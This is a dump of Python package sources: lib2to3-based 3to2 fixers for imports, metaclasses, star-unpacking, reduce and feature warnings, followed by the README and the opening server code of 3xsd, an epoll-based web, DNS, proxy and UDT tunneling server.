new_names.append(ImportAsName(test_name, rename, prefix=" "))
new_names.append(Comma())
new_names.pop()
imports.append(FromImport(new_pkg, new_names))
# Replace this import statement with one of the others
replacement = imports.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
# Add the remainder of the imports as new statements.
while imports:
next_stmt = Node(syms.simple_stmt, [imports.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif using.type == token.STAR:
# from urllib.request import *
nodes = [FromImport(pkg, [Star(prefix=" ")]) for pkg in
all_candidates(name.value, attr.value)]
replacement = nodes.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
while nodes:
next_stmt = Node(syms.simple_stmt, [nodes.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif power is not None:
# urllib.request.urlopen
# Replace it with urllib2.urlopen
pkg = new_package(name.value, attr.value, using.value)
# Remove the trailer node that contains attr.
if pkg:
if attr.parent:
attr.parent.remove()
name.replace(Name(pkg, prefix=name.prefix))
elif using.type == token.NAME:
# from urllib.request import urlopen
pkg = new_package(name.value, attr.value, using.value)
if attr.value == "__init__" and pkg == name.value:
# Replacing "from abc import xyz" with "from abc import xyz"
# Just leave it alone so as not to mess with other fixers
return
else:
node.replace(FromImport(pkg, [using])) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_imports2.py | fix_imports2.py |
from lib2to3 import fixer_base
from ..fixer_util import Name, syms, Node, Leaf, Newline, find_root, indentation, suitify
from lib2to3.pygram import token
def has_metaclass(parent):
results = None
for node in parent.children:
kids = node.children
if node.type == syms.argument:
if kids[0] == Leaf(token.NAME, "metaclass") and \
kids[1] == Leaf(token.EQUAL, "=") and \
kids[2]:
#Hack to avoid "class X(=):" with this case.
results = [node] + kids
break
elif node.type == syms.arglist:
# Argument list... loop through it looking for:
# Node(*, [*, Leaf(token.NAME, u"metaclass"), Leaf(token.EQUAL, u"="), Leaf(*, *)]
for child in node.children:
if results: break
if child.type == token.COMMA:
#Store the last comma, which precedes the metaclass
comma = child
elif type(child) == Node:
meta = equal = name = None
for arg in child.children:
if arg == Leaf(token.NAME, "metaclass"):
#We have the (metaclass) part
meta = arg
elif meta and arg == Leaf(token.EQUAL, "="):
#We have the (metaclass=) part
equal = arg
elif meta and equal:
#Here we go, we have (metaclass=X)
name = arg
results = (comma, meta, equal, name)
break
return results
class FixMetaclass(fixer_base.BaseFix):
PATTERN = """
classdef<any*>
"""
def transform(self, node, results):
meta_results = has_metaclass(node)
if not meta_results: return
for meta in meta_results:
meta.remove()
target = Leaf(token.NAME, "__metaclass__")
equal = Leaf(token.EQUAL, "=", prefix=" ")
# meta is the last item in what was returned by has_metaclass(): name
name = meta
name.prefix = " "
stmt_node = Node(syms.atom, [target, equal, name])
suitify(node)
for item in node.children:
if item.type == syms.suite:
for stmt in item.children:
if stmt.type == token.INDENT:
# Insert, in reverse order, the statement, a newline,
# and an indent right after the first indented line
loc = item.children.index(stmt) + 1
# Keep consistent indentation form
ident = Leaf(token.INDENT, stmt.value)
item.insert_child(loc, ident)
item.insert_child(loc, Newline())
item.insert_child(loc, stmt_node)
break | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_metaclass.py | fix_metaclass.py |
from lib2to3 import fixer_base
from itertools import count
from ..fixer_util import Assign, Comma, Call, Newline, Name, Number, indentation, suitify, commatize, token, syms, Node, Leaf
def assignment_source(num_pre, num_post, LISTNAME, ITERNAME):
"""
Accepts num_pre and num_post, which are counts of values
before and after the starg (not including the starg)
Returns a source fit for Assign() from fixer_util
"""
children = []
pre = str(num_pre)
post = str(num_post)
# This code builds the assignment source from lib2to3 tree primitives.
# It's not very readable, but it seems like the most correct way to do it.
if num_pre > 0:
pre_part = Node(syms.power, [Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Leaf(token.COLON, ":"), Number(pre)]), Leaf(token.RSQB, "]")])])
children.append(pre_part)
children.append(Leaf(token.PLUS, "+", prefix=" "))
main_part = Node(syms.power, [Leaf(token.LSQB, "[", prefix=" "), Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Number(pre) if num_pre > 0 else Leaf(1, ""), Leaf(token.COLON, ":"), Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]) if num_post > 0 else Leaf(1, "")]), Leaf(token.RSQB, "]"), Leaf(token.RSQB, "]")])])
children.append(main_part)
if num_post > 0:
children.append(Leaf(token.PLUS, "+", prefix=" "))
post_part = Node(syms.power, [Name(LISTNAME, prefix=" "), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]), Leaf(token.COLON, ":")]), Leaf(token.RSQB, "]")])])
children.append(post_part)
source = Node(syms.arith_expr, children)
return source
class FixUnpacking(fixer_base.BaseFix):
PATTERN = """
expl=expr_stmt< testlist_star_expr<
pre=(any ',')*
star_expr< '*' name=NAME >
post=(',' any)* [','] > '=' source=any > |
impl=for_stmt< 'for' lst=exprlist<
pre=(any ',')*
star_expr< '*' name=NAME >
post=(',' any)* [','] > 'in' it=any ':' suite=any>"""
def fix_explicit_context(self, node, results):
pre, name, post, source = (results.get(n) for n in ("pre", "name", "post", "source"))
pre = [n.clone() for n in pre if n.type == token.NAME]
name.prefix = " "
post = [n.clone() for n in post if n.type == token.NAME]
target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
# to make the special-case fix for "*z, = ..." correct with the least
# amount of modification, make the left-side into a guaranteed tuple
target.append(Comma())
source.prefix = ""
setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [source.clone()]))
power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
return setup_line, power_line
def fix_implicit_context(self, node, results):
"""
Only example of the implicit context is
a for loop, so only fix that.
"""
pre, name, post, it = (results.get(n) for n in ("pre", "name", "post", "it"))
pre = [n.clone() for n in pre if n.type == token.NAME]
name.prefix = " "
post = [n.clone() for n in post if n.type == token.NAME]
target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
# to make the special-case fix for "*z, = ..." correct with the least
# amount of modification, make the left-side into a guaranteed tuple
target.append(Comma())
source = it.clone()
source.prefix = ""
setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [Name(self.ITERNAME)]))
power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
return setup_line, power_line
def transform(self, node, results):
"""
a,b,c,d,e,f,*g,h,i = range(100) changes to
_3to2list = list(range(100))
a,b,c,d,e,f,g,h,i, = _3to2list[:6] + [_3to2list[6:-2]] + _3to2list[-2:]
and
for a,b,*c,d,e in iter_of_iters: do_stuff changes to
for _3to2iter in iter_of_iters:
_3to2list = list(_3to2iter)
a,b,c,d,e, = _3to2list[:2] + [_3to2list[2:-2]] + _3to2list[-2:]
do_stuff
"""
self.LISTNAME = self.new_name("_3to2list")
self.ITERNAME = self.new_name("_3to2iter")
expl, impl = results.get("expl"), results.get("impl")
if expl is not None:
setup_line, power_line = self.fix_explicit_context(node, results)
setup_line.prefix = expl.prefix
power_line.prefix = indentation(expl.parent)
setup_line.append_child(Newline())
parent = node.parent
i = node.remove()
parent.insert_child(i, power_line)
parent.insert_child(i, setup_line)
elif impl is not None:
setup_line, power_line = self.fix_implicit_context(node, results)
suitify(node)
suite = [k for k in node.children if k.type == syms.suite][0]
setup_line.prefix = ""
power_line.prefix = suite.children[1].value
suite.children[2].prefix = indentation(suite.children[2])
suite.insert_child(2, Newline())
suite.insert_child(2, power_line)
suite.insert_child(2, Newline())
suite.insert_child(2, setup_line)
results.get("lst").replace(Name(self.ITERNAME, prefix=" ")) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_unpacking.py | fix_unpacking.py |
from .feature_base import Feature, Features
from lib2to3 import fixer_base
FEATURES = [
#(FeatureName,
# FeaturePattern,
# FeatureMinVersion,
#),
("memoryview",
"power < 'memoryview' trailer < '(' any* ')' > any* >",
"2.7",
),
("numbers",
"""import_from< 'from' 'numbers' 'import' any* > |
import_name< 'import' ('numbers' dotted_as_names< any* 'numbers' any* >) >""",
"2.6",
),
("abc",
"""import_name< 'import' ('abc' dotted_as_names< any* 'abc' any* >) > |
import_from< 'from' 'abc' 'import' any* >""",
"2.6",
),
("io",
"""import_name< 'import' ('io' dotted_as_names< any* 'io' any* >) > |
import_from< 'from' 'io' 'import' any* >""",
"2.6",
),
("bin",
"power< 'bin' trailer< '(' any* ')' > any* >",
"2.6",
),
("formatting",
"power< any trailer< '.' 'format' > trailer< '(' any* ')' > >",
"2.6",
),
("nonlocal",
"global_stmt< 'nonlocal' any* >",
"3.0",
),
("with_traceback",
"trailer< '.' 'with_traceback' >",
"3.0",
),
]
class FixFeatures(fixer_base.BaseFix):
run_order = 9 # Wait until all other fixers have run to check for these
# To avoid spamming, we only want to warn for each feature once.
features_warned = set()
# Build features from the list above
features = Features([Feature(name, pattern, version) for \
name, pattern, version in FEATURES])
PATTERN = features.PATTERN
def match(self, node):
to_ret = super(FixFeatures, self).match(node)
# We want the mapping only to tell us the node's specific information.
try:
del to_ret['node']
except Exception:
# We want it to delete the 'node' from the results
# if it's there, so we don't care if it fails for normal reasons.
pass
return to_ret
def transform(self, node, results):
for feature_name in results:
if feature_name in self.features_warned:
continue
else:
curr_feature = self.features[feature_name]
if curr_feature.version >= "3":
fail = self.cannot_convert
else:
fail = self.warning
fail(node, reason=curr_feature.message_text())
self.features_warned.add(feature_name) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_features.py | fix_features.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Call
from lib2to3.pytree import Node, Leaf
from lib2to3.pgen2 import token
class FixReduce(fixer_base.BaseFix):
PATTERN = """
power< 'functools' trailer< '.' 'reduce' >
args=trailer< '(' arglist< any* > ')' > > |
imported=import_from< 'from' 'functools' 'import' 'reduce' > |
import_from< 'from' 'functools' 'import' import_as_names< any* in_list='reduce' any* > >
"""
def transform(self, node, results):
syms = self.syms
args, imported = (results.get("args"), results.get("imported"))
in_list = results.get("in_list")
if imported:
next = imported.next_sibling
prev = imported.prev_sibling
parent = imported.parent
if next and next.type == token.SEMI:
next.remove()
next = imported.next_sibling
imported.remove()
if next is not None and next.type == token.NEWLINE:
# nothing after from_import on the line
if prev is not None:
if prev.type == token.SEMI:
prev.remove()
elif parent.next_sibling is not None:
# nothing before from_import either
parent.next_sibling.prefix = imported.prefix
parent.remove()
elif args:
args = args.clone()
prefix = node.prefix
return Node(syms.power, [Leaf(token.NAME, "reduce"), args],
prefix=prefix)
elif in_list:
next = in_list.next_sibling
if next is not None:
if next.type == token.COMMA:
next.remove()
else:
prev = in_list.prev_sibling
if prev is not None:
if prev.type == token.COMMA:
prev.remove()
in_list.remove() | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_reduce.py | fix_reduce.py |
##3xsd
3xsd is a native epoll server serving TCP/UDP connections, a high performance static web server, a
failover dns server, a http-based distributed file server, a load-balance proxy-cache server, and
a 'warp drive' server. Written in python, take the full power of multi-cores.
##Features in detail:
###3wsd - web server
supporting: static files, event driven(epoll), using mmap & sendfile to send files,
in-mem xcache, transparent gzip content transfer with fixed length(small file) &
chunked(large file), persistent storage of gzip files,
partial support of WebDAV(PUT/DELETE), pipelining support
###3nsd - dns server
supporting: only A record resolution, domainname failover(refer to conf file),
ip icmp probe & hide when fail, round robbin ip resolving
global DNS Left-Right Range Resolve(LRRR)(experimental)
###3zsd - proxy server
supporting: load balance backend servers, in-mem file caching &
persistent cache file storage
###3fsd - distribute web file system
supporting: mass unlimitted file storage, easy to expand,
O(1) location algorithm, non-centralized, can work with standard web server(WebDAV)
in proxy mode, file redundancy, file persistent caching
###3wdd - 'warp drive' server
supporting: data tunneling over UDT and tun,
better congestion control than TCP/UDP over wan link,
better thoughput(above 80%) over wan link, refer to this report:
http://www.c-s-a.org.cn/ch/reader/create_pdf.aspx?file_no=20091035
tunnel ip/mtu/txqueuelen/route define, auto create/recreate/destroy
encrypt packages through AES-128-ECB/CBC/CFB/CTR and Blowfish-CBC/CFB/CTR
tunnel on-the-fly compress with zlib/lzo, tunnel data relaying
route metric, routing data through different path, depending on tunnel rtt(choose the best one)
More to find in .conf file.
##Performance:
###3wsd:
Small file under 1KB single process test(full in-mem), contrast with nginx configuring
accept_mutex off, 80% performance.
Multi processes test, with reuse_port enabling kernel, 95% performance of nginx(and beyond,
may be 105% or more, based on process number, I tested 2-4).
The tests above is not quite strict, but I just want to say that it's fast enough.
And with pipelining enabled, 3wsd will perform better with 3-4 requests/send(5%-10%
performance increase), 2 requests/send have the same speed with non-piplining.
###3zsd:
About 80% performance of 3wsd.
###3nsd:
Fast enough...about 2800-3000 queries/s per processes, with 1GHz bcm2709 4-cores ARMv7
cpu testing, better when multi-processes with reuse_port enabling kernel.
###3fsd:
Same with 3zsd.
###3wdd:
Early testing indicated that:
UDT tunnel(no encrypt) performing 50%-60% speed of direct TCP connection with ZetaTCP,
and package lost rate remaining below 0.6%, while direct connection has 1.4%-3%.
(Test CN-US WAN link with 150ms-280ms latency, through the always-jammed CUCN submarine cable)
However, UDT tunnel beats normal TCP connection without ZetaTCP, with 50% - 4 times
(commonly 1-2 times) outperforming.(v)(Test link like above)
Update:
And an encrypted UDT tunnel with AES-CBC/CFB will has 50% performance decrease (because the
method itself processes doubled size of data, and extra iv/padding data transfer).
Now with a Blowfish-CTR method, tunnel data transfer performance is closed to raw non-encrypt
tunnel. I believe that with a intel AES-NI supported CPU(like XEON E3-1240/1270), AES-128-CTR
can also do it.
###More performance:
There are at lease two ways to increase the performance of 3xsd:
1.Install Cython, and rename _3xsd.py to _3xsd.pyx, run it.
Cython will compile _3xsd.py lib into a _3xsd.so file, using static type
declarations. This can gain about 5%-6% performance increasement.
2.Use PyPy.This can gain about 10%-15% performance increasement(or more).
#OS requirement & install:
CentOS 6/7 with python 2.6/2.7, Debian 6/7. Python 2.7 recommended.
Doing this before running the program(minimal requirement):
yum install python-gevent pysendfile python-setproctitle python-psutil python-pip
(python-pip is optional if install dpkt)
Dpkt module is also needed when running 3nsd DNS server, pip install it.
If you want to use 3wdd, python-pytun, pyudt4, pycrypto, python-lzo are also needed.
yum install python-crypto2.6 python-lzo (for centos6)
yum install python2-crypto (for centos7)
will quickly install pycrypto(probably do some 'linking' works) and lzo. The other two depended on pip install.
Probably you need this easy-install.pth file in python's site-packages dir:
import sys; sys.__plen = len(sys.path)
./pycrypto-2.6.1-py2.6-linux-x86_64.egg
./pyudt4-0.6.0-py2.6-linux-x86_64.egg
import sys; new=sys.path[sys.__plen:]; del sys.path[sys.__plen:]; p=getattr(sys,'__egginsert',0); sys.path[p:p]=new; sys.__egginsert = p+len(new)
I provide pre-compiled package [pyudt_tun-centos6-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun-centos6-x86_64.tar.gz) and [pyudt_tun_lzo-centos7-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun_lzo-centos7-x86_64.tar.gz) to simplify
the installation procedure of pyudt4 & python-pytun.
Be aware of pyudt4 having some bugs, you'd better download it's source code of epoll-fixes branch and
apply the patch I offered. See changelog.txt v0.0.20 2016.03.07 fixed section for detail.
(Already included in [pyudt_tun-centos6-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun-centos6-x86_64.tar.gz) and [pyudt_tun_lzo-centos7-x86_64.tar.gz](https://github.com/zihuaye/3xsd/blob/master/pyudt_tun_lzo-centos7-x86_64.tar.gz))
Or, of cause you can let pip do it all for you(not including patching pyudt4):
pip install 3xsd
In a debian, you can use apt-get to install python-pip(pip) or python-setuptools(easy_install),
then to install the packages following.
Python Packages(Modules) version reference:
gevent==0.13.8(1.0.1, 1.1)
greenlet==0.4.2
pysendfile==2.0.1
setproctitle==1.0.1
psutil==0.6.1
dpkt==1.6(1.8.6)
python-pytun==2.2.1
pyudt4==0.6.0(epoll-fixes branch)
pycrypto==2.6.1
python-lzo==1.8
System libs version reference:
libevent-1.4.13-4(not actually used, just needed for gevent to function)
udt-4.11-6
lzo-2.03-3.1
To install a module of specific version(like gevent 0.13.8), you can:
pip install gevent==0.13.8
This will install the latest version of gevent(pypy will need it):
pip install git+git://github.com/surfly/gevent.git#egg=gevent
| 3xsd | /3xsd-0.0.26.tar.gz/3xsd-0.0.26/README.md | README.md |
__version__ = "0.0.26"
import os, sys, io, time, calendar, random, multiprocessing, threading
import shutil, mmap, sendfile, zlib, gzip, lzo, copy, setproctitle
import _socket as socket
import select, errno, gevent, dpkt, ConfigParser, hashlib, struct, shelve
import pytun, udt4, subprocess, fcntl, geoip2.database
from distutils.version import StrictVersion
from datetime import datetime
from collections import deque
from gevent.server import StreamServer
from gevent.coros import Semaphore
from udt4 import pyudt as udt
from Crypto.Cipher import AES
from Crypto.Cipher import Blowfish
from Crypto.Util import Counter
from Crypto import Random
Port = 8000 #Listening port number
Backlog = 1000 #Listening backlog
Conns = None #gevent.pool type, connection limit
Workers = 0 #workers to fork, 0 for no worker
Homedir = None #3xsd working home(document root)
Handler = None #3xsd handler name, not an instance
Server = None #3xsd server instance, init at startup
X_shelf = 0 #persistent storage of xcache(3zsd&3fsd)
Z_mode = 0 #0 - RR(default), 1 - IP Hash, 2 - URL Hash, for 3zsd
_Name = '3xsd' #program name, changes at startup
o_socket = socket
o_sendfile = sendfile.sendfile
def Handle_Gevent_Stream(sock, addr):
#Handler __init__, pass params with no name, can help boosting call procedure
Handler(sock, addr, Server, False, True)
class _Z_StreamServer(StreamServer):
workers = 0
_worker_id = 0
xcache = {}
x_reqs = {}
max_accept = 500
server_mode = ''
zlb_mode = False
def __init__(self, server_address, RequestHandlerClass, backlog=1000, spawn=None):
StreamServer.__init__(self, server_address, RequestHandlerClass, backlog=backlog, spawn=spawn)
if StrictVersion(gevent.__version__) >= StrictVersion('1.0'):
self._stopped_event = self._stop_event
def pre_start(self):
if StrictVersion(gevent.__version__) >= StrictVersion('1.0'):
StreamServer.init_socket(self)
else:
StreamServer.pre_start(self)
def master_works(self):
#obsolete
if hasattr(socket, "SO_REUSEPORT"):
self.socket.close()
class _Z_EpollServer(StreamServer):
workers = 0
_worker_id = 0
max_accept = 500
reuse_port = True
server_mode = b''
zlb_mode = False
_fds = []
epoll = None
#for 3wsd - web server
conns = {}
addrs = {}
xcache = {}
xcache_stat = {}
x_reqs = {}
resume = {}
gzip_shelf = None
gzip_shelf_lock = None
_gzs = {}
#for 3zsd - z server
cb_conns = {}
k_conns = {}
zconns = {}
zidles = {}
zconns_stat = {}
zaddrs = {}
zhosts = {}
zcache = {}
zcache_stat = {}
z_reqs = {}
z_reqs_stat = {}
z_reqs_cnt = {}
z_resp_header = {}
z_path = {}
c_path = {}
xcache_shelf = None
xcache_shelf_lock = None
#for 3wdd - warp drive
zsess = {} #session <-> (tun, udt socket)
ztuns = {} #tunnels & fd
s_tuns = {} #sessions connected with tuns
s_udts = {} #sessions connected with udts
upolls = [] #the udt socket & tun epolls
udt_send_buf = {}
udt_thread_limit = 0
udt_conns_cnt = {}
udt_conns_cnt_lock = None
udt_conn_port = None
udt_conn_port_lock = None
def __init__(self, server_address, RequestHandlerClass, backlog=1000, spawn=None,
tcp=True, udt=False, recv_buf_size=16384, send_buf_size=65536):
if tcp:
self.recv_buf_size = recv_buf_size
self.send_buf_size = send_buf_size
elif udt:
#this buffer size is about 100Mbps bandwidth between CN&US(Bandwidth*RTT/8)
self.recv_buf_size = 2760000
self.send_buf_size = 2760000
#udt not work with reuse_port option
self.reuse_port = False
#self.udt_thread_limit = multiprocessing.cpu_count()
self.udt_thread_limit = 1 #set thread_limit to 1 for the GIL
self.udt_conns_cnt_lock = multiprocessing.Lock()
for i in xrange(Workers + 1):
self.udt_conns_cnt[i] = multiprocessing.Value('i', 0, lock=self.udt_conns_cnt_lock)
self.udt_conn_port_lock = multiprocessing.Lock()
self.udt_conn_port = multiprocessing.Value('i', Port, lock=self.udt_conn_port_lock)
else:
self.recv_buf_size = 65536
self.send_buf_size = 65536
self.tcp = tcp
self.udt = udt
StreamServer.__init__(self, server_address, RequestHandlerClass, backlog=backlog, spawn=spawn)
self.handler = RequestHandlerClass(None, None, self)
if hasattr(socket, "SO_REUSEPORT"):
print("Good, this kernel has SO_REUSEPORT support")
def master_works(self):
if hasattr(socket, "SO_REUSEPORT") and self.reuse_port and not self.udt:
#close master process's listening socket, because it never serving requests
self.socket.close()
def pre_start(self):
self.init_socket(tcp=self.tcp)
def set_socket_buf(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.recv_buf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.send_buf_size)
def init_socket(self, tcp=True):
if tcp:
if self.server_mode == 'z_lbs' or self.server_mode == 'x_dfs':
self.zlb_mode = True
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
else:
if not self.udt:
#i_dns mode
socket.socket = gevent.socket.socket
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
if not self.udt:
if self.reuse_addr == 1:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT") and self.reuse_port:
#good, this kernel has SO_REUSEPORT support
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
self.set_socket_buf()
if tcp:
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_DEFER_ACCEPT, 1)
self.socket.bind(self.address)
self.socket.setblocking(0)
self.socket_fileno = self.socket.fileno()
if tcp:
self.socket.listen(self.backlog)
else:
self.handler.sock = self.socket
else:
if self._worker_id == 0 and self.workers > 0:
#delay socket init for udt worker
self.socket = None
return
udt4.startup()
if self.handler.wdd_mode == 'server' or self.handler.wdd_mode == 'hybird':
self.socket = udt.UdtSocket()
#if self.reuse_addr == 1:
# self.socket.setsockopt(udt4.UDT_REUSEADDR, True) #default on
#self.socket.setsockopt(udt4.UDT_MSS, 9000) #default 1500
self.socket.setsockopt(udt4.UDT_RCVBUF, self.recv_buf_size) #default 10MB
self.socket.setsockopt(udt4.UDT_SNDBUF, self.send_buf_size) #default 10MB
if self.workers > 0:
_ip, _port = self.address
_port = _port + self._worker_id - 1
self.address = (_ip, _port)
self.socket.bind(self.address)
self.socket.listen(self.backlog)
else:
self.socket = None
def cleanupall(self):
if self.tcp:
self.epoll.unregister(self.socket.fileno())
self.epoll.close()
self.conns.clear()
self.addrs.clear()
self.xcache.clear()
self.x_reqs.clear()
def cleanup(self, fd):
try:
self.epoll.unregister(fd)
self.conns[fd].close()
except:
pass
try:
self.conns.pop(fd)
self.addrs.pop(fd)
self.x_reqs.pop(fd)
except:
pass
def cleanz(self, fd):
try:
self.epoll.unregister(fd)
except IOError as e:
pass
try:
#clean c-z pair in cb_conns
if self.cb_conns.get(fd, None):
self.cb_conns[self.cb_conns[fd][1]] = None
self.cb_conns[fd] = None
self.keep_connection = 0
#self.zconns[fd].close() #will be closed by clean()
self.cb_conns.pop(fd, None)
self.zconns.pop(fd, None)
self.zconns_stat.pop(fd, None)
self.zaddrs.pop(fd, None)
self.z_reqs.pop(fd, None)
self.z_reqs_cnt.pop(fd, None)
self.z_reqs_stat.pop(fd, None)
self.zhosts.pop(fd, None)
self.zcache.pop(fd, None)
self.zcache_stat.pop(fd, None)
self.z_resp_header.pop(fd, None)
self.z_path.pop(fd, None)
except:
pass
def clean_zidles(self, fd):
for _host, _idle_list in self.zidles.iteritems():
if fd in _idle_list:
self.zidles[_host].remove(fd)
def cleanc(self, fd):
try:
self.epoll.unregister(fd)
except IOError as e:
pass
try:
if self.cb_conns.get(fd, None):
self.cb_conns[self.cb_conns[fd][1]] = None
self.cb_conns[fd] = None
self.keep_connection = 0
self.c_path.pop(fd, None)
self.k_conns.pop(fd, None)
except:
pass
def o_stack(self, o=None):
if o == None:
return
elif o == "resume":
print self.resume
elif o == "zconns":
print self.zconns
elif o == "cb_conns":
print self.cb_conns
elif o == "xcache":
print self.xcache
elif o == "zcache":
print self.zcache
elif o == "zcache_stat":
print self.zcache_stat
elif o == "z_path":
print self.z_path
elif o == "z_resp_header":
print self.z_resp_header
def o_udts(self):
print "-------------------------------------"
print "conns", self.conns
print "zsess", self.zsess
print "ztuns", self.ztuns
print "s_tuns", self.s_tuns
print "s_udts", self.s_udts
print "upolls", self.upolls
print "udt_send_buf", self.udt_send_buf
def o_mem(self):
#if os.path.exists('/tmp/3wdd_dumpit'):
# scanner.dump_all_objects('/tmp/3wdd_dump.txt')
pass
def check_3ws(self):
while 1:
try:
if self.handler.gzip_on and self.gzip_shelf and self.gzip_shelf.cache:
_over = len(self.gzip_shelf.cache) - 1000
_delx = int(_over/8)
if _over > 1000:
self.gzip_shelf.cache.clear()
elif _over > 0 and _delx > 9:
while _delx > 0:
self.gzip_shelf.cache.popitem()
_delx -= 1
if hasattr(self.gzip_shelf.dict, 'sync'):
#self.gzip_shelf.dict is an anydbm object, mostly gdbm or bsddb
with self.gzip_shelf_lock:
self.gzip_shelf.dict.sync()
#print self.xcache
except:
pass
time.sleep(15)
def get_tcp_stat(self, sock):
_fmt = "B"*7+"I"*21
_x = struct.unpack(_fmt, sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_INFO, 92))
return _x[0]
def check_lbs(self):
while 1:
try:
#maintain mem caches & shelfies
if self.handler.z_xcache_shelf and self.xcache_shelf and self.xcache_shelf.cache:
_over = len(self.xcache_shelf.cache) - self.handler.z_cache_size
_delx = int(_over/8)
if _over > self.handler.z_cache_size:
self.xcache_shelf.cache.clear()
elif _over > 0 and _delx > 9:
while _delx > 0:
self.xcache_shelf.cache.popitem()
_delx -= 1
if hasattr(self.xcache_shelf.dict, 'sync'):
#self.xcache_shelf.dict is an anydbm object, mostly gdbm or bsddb
with self.xcache_shelf_lock:
self.xcache_shelf.dict.sync()
#maintain backend conns
#print "------------------------------------------"
#print "conns:", self.conns
#print "zconns:", self.zconns
#print "cb_conns:", self.cb_conns
#print "zidles:", self.zidles
_keys = self.zconns.keys()
if _keys:
for _f in _keys:
if self.zconns[_f].fileno() == -1 or self.get_tcp_stat(self.zconns[_f]) != 1:
#connection not in ESTABLISHED stat, being closed
self.clean_zidles(_f)
self.cleanz(_f)
_keys = self.conns.keys()
if _keys:
for _f in _keys:
if self.conns[_f].fileno() == -1:
#client connection being closed
self.conns.pop(_f)
self.cb_conns.pop(_f)
except:
pass
time.sleep(15)
def handle_event(self, events):
for f, ev in events:
if f == self.socket_fileno:
#new connection..
try:
#multi workers to accept same connection, only one can get it
conn, addr = self.socket.accept()
except:
continue
c = conn.fileno()
#conn.setblocking(0)
#self.epoll.register(c, select.EPOLLIN | select.EPOLLET)
self.epoll.register(c, select.EPOLLIN)
self.conns[c] = conn
self.addrs[c] = addr
elif ev & select.EPOLLIN:
#read event..
if f not in self.zconns:
self._fds.append((f, 0))
else:
self._fds.append((f, 2))
elif ev & select.EPOLLOUT:
#write event..
if f not in self.zconns:
self._fds.append((f, 1))
else:
self._fds.append((f, 3))
elif ev & select.EPOLLHUP:
#connection closed..
self.cleanup(f)
if len(self._fds) > 0:
#we have works to do, call handler
self.handler(self._fds)
del self._fds[:]
def if_reinit_socket(self):
if hasattr(socket, "SO_REUSEPORT") and self.reuse_port and self.workers > 0:
self.init_socket(tcp=self.tcp)
elif self.udt and self.workers > 0:
self.init_socket(tcp=self.tcp)
def serve_forever(self):
#see if reinit socket is neccessary
self.if_reinit_socket()
#single master gets an epoll, multi workers get multi epolls
self.epoll = select.epoll()
#register fd and events to poll
self.epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
while 1:
self.handle_event(self.epoll.poll())
finally:
self.cleanupall()
self.socket.close()
def serve_dns(self):
self.if_reinit_socket()
self.epoll = select.epoll()
self.epoll.register(self.socket.fileno(), select.EPOLLIN | select.EPOLLET)
try:
gevent.spawn(self.handler.probe_ips) #a separate greenlet to perform ip stat checking
while 1:
gevent.sleep(1e-20) #a smallest float, works both at v0.13.8 and v1.0.x
_events = self.epoll.poll(10) #long-timeout helping cpu% lower
if len(_events) > 0:
self.handler(_events)
finally:
self.cleanupall()
self.socket.close()
def serve_lbs(self):
self.if_reinit_socket()
self.epoll = select.epoll()
self.epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
t = threading.Timer(15, self.check_lbs)
t.start()
while 1:
self.handle_event(self.epoll.poll())
finally:
self.cleanupall()
self.socket.close()
def serve_wds(self): #www
try:
s = 0
while s < self.udt_thread_limit:
self.upolls.append(None)
s += 1
if self.handler.wdd_mode == 'client' or self.handler.wdd_mode == 'hybird':
if 1:
_idx = -1
for _session in self.handler.wdd_dial:
_idx += 1
if self.workers > 1 and (_idx % self.workers) + 1 != self._worker_id:
continue
if _session in self.handler.client_session:
t = threading.Thread(target=self.handler.connect_udt_server, args=(_session,))
t.daemon = True
t.start()
t = threading.Thread(target=self.check_3wd, args=())
t.daemon = True
t.start()
if self.handler.wdd_mode == 'server' or self.handler.wdd_mode == 'hybird':
self.if_reinit_socket()
while 1:
#accept incoming udt connection
_conn, _addr = self.socket.accept()
#launch setting up udt_tunnel
t = threading.Thread(target=self.handler.setup_udt_connection, args=(_conn,_addr,))
t.start()
if self.handler.wdd_mode == 'client':
while 1:
time.sleep(1000)
except:
raise
finally:
if self.socket:
